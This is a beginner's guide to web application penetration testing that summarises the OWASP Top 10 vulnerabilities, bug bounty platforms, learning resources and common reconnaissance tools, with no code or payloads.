Newbies guide to Web Application Penetration Testing


In today’s world, many organizations host websites for their users to interact with the organization online. Although this can be a companies greatest asset, it can also be one of their greatest liability. The reason behind this is because web applications contain many vulnerabilities, starting from Cross-site scripting to default configurations and many more.

Web exploitation is the process of understanding how web applications work and leveraging it to reveal important information that should not be accessible to unauthorized users. This is because web application have many vulnerabilities, it can be poor coding on the backend server or no proper input validation and many more. All of these common vulnerabilities can be found on the OWASP Top 10 list.

1. Injection #

— Injection is an attack where an attacker attempts to send data to an application in way to retrieve information that should not be accessible. The most common example of an injection attack is SQL Injection, it where the attack send modified SQL queries to the application to change or retrieve data.

2. Broken Authentication #

— This happens when there is poorly implemented authentication and software management functions. This allows attackers to have access to the application as the victim.

3. Sensitive Data Exposure #

— Sensitive Data exposure is a vulnerability where the web application does not properly protect sensitive information like session tokens, cookies, passwords, location and any other crucial data who leak can be very bad for a user.

4. XML External Entities (XXE) #

— XML external entity injection is a vulnerability that allows an attack to interfere with an application’s processing of XML data

5. Broken Access Control #

— Access control is an implementation where users cannot act outside of their intended permissions. When a user can access other users data that they should not be able to access it is called Broken Access Control

6. Security Misconfiguration #

— Security misconfiguration occurs when a web application has insecure default configurations, verbose error messages containing information any many more misconfigurations that should be fixed.

7. Cross-Site Scripting #

— XSS or Cross-site scripting occurs when an attacker can send / inject client-side scripts into web pages viewed by other users. There are 3 main types of XSS attacks

○ Reflected XSS: The injected malicious script comes from the HTTP request

○ Stored XSS: The injected malicious script comes from the website’s database

○ DOM-based XSS: Occurs when the attacker is able to execute malicious JavaScript, which allows them to hijack other user’s accounts.

8. Insecure Deserialization #

— Insecure deserialization I vulnerability which occurs when untrusted data is used to break the logic of an application allowing the attacker to remotely execute commands

9. Using Components with Known Vulnerabilities #

— Using components with known vulnerabilities is when an attacker can leverage the vulnerability and can get user or admin privileges as components such as frameworks and other software modules, run with the same privileges as the application.

10. Insufficient Logging and Monitoring #

— Insufficient logging and monitoring allows attackers to further attack systems and maintain persistence because without sufficient logging and monitoring, no one notices that they have been attacked and the attacker still has access to the system.

Bug Bounty #

A bug bounty program is a deal offered by many organizations where they allow individuals to find vulnerabilities within their websites (within a predefined scope) and report them to the company for cash.

Where to sign up and start Bug bounty hunting


Hackerone is a great platform to get started with bug bounty hunting, they also provide lessons for beginners and when you finish a certain number of challenges and earn around 26 points, you are sent a private invitation to join a private program. This can be found here:


Bugcrowd is another great platform to get started with bug bounty hunting.


Intigriti offers bug bounty and agile penetration testing solutions powered by Europe’s #1 leading network of ethical hackers.


Synack Red Team The power behind the Synack platform is an elite team of the world’s top cybersecurity researchers — drawn from over 80 countries, recruited for their skill, and chosen based on trust.

Where to learn Web Application Pentesting / Bug Bounty Hunting #

PortSwigger Web Academy

— This is one of the best platforms to learn how to hack websites, they provide free learning materials and labs to apply what you learn.

— Topics Covered:

○ SQL Injection

○ Cross-site scripting

○ Cross-site request forgery (CSRF)

○ Clickjacking

○ DOM-based vulnerabilities

○ Cross-origin resource sharing (CORS)

○ XML external entity (XXE) injection

○ Server-side request forgery (SSRF)

○ HTTP request smuggling

○ OS command injection

○ Server-side template injection

○ Directory traversal

○ Access control vulnerabilities

○ Authentication

○ WebSockets

○ Web cache poisoning

○ Insecure deserialization

○ Information disclosure

○ Business login vulnerabilities

○ HTTP Host header attacks

○ OAuth authentication

Hacker101 Hacker101 is a free class for web security. Whether you’re a programmer with an interest in bug bounties or a seasoned security professional, Hacker101 has something to teach you.


— Website Hacking / Penetration Testing and Bug Bounty Hunting by Zaid Sahib, z Security

— Intro to Bug Bounty Hunting and Web Application Hacking by Ben Sadeghipour aka NahamSec


— Web Fundamentals Path

— Web Hacking Fundamentals

Common tools in bug bounty hunting #


— The most well known tool known to bug hunters, burpsuite is one of the most popular penetration testing and vulnerability finder tools, and is often used for checking web application security. They have a community edition and a professional version with faster bruteforcing and other better configured options

Gobuster / Dirbuster

— These tools are used for finding hidden directories which may contain important information or information that should not be publicly available.


— Dirsearch is a command-line tool designed to brute force directories and files within webservers. It is written in Python and can run on Windows, Linux and macOS


— Short for “Fuzz Faster you Fool”, Ffuf is open source web fuzzing tool, intended for discovering important information like elements and content within web applications.


— Aquatone is a tool for visual inspection of websites across many hosts and is a fast tool that finds information about a HTTP-based attack surface.


— Subfinder is a subdomain discovery tool that finds valid subdomains for websites. It is a simple tool and is optimized for speed.


— Owasp Amass is an open source network mapping and attack surface discovery tool that uses different techniques like information gathering to find all the available data on the target.


— Nuclei is a fast tool that is used to send requests across targets based on a template leading to zero false positives. It provides effective scanning for known paths.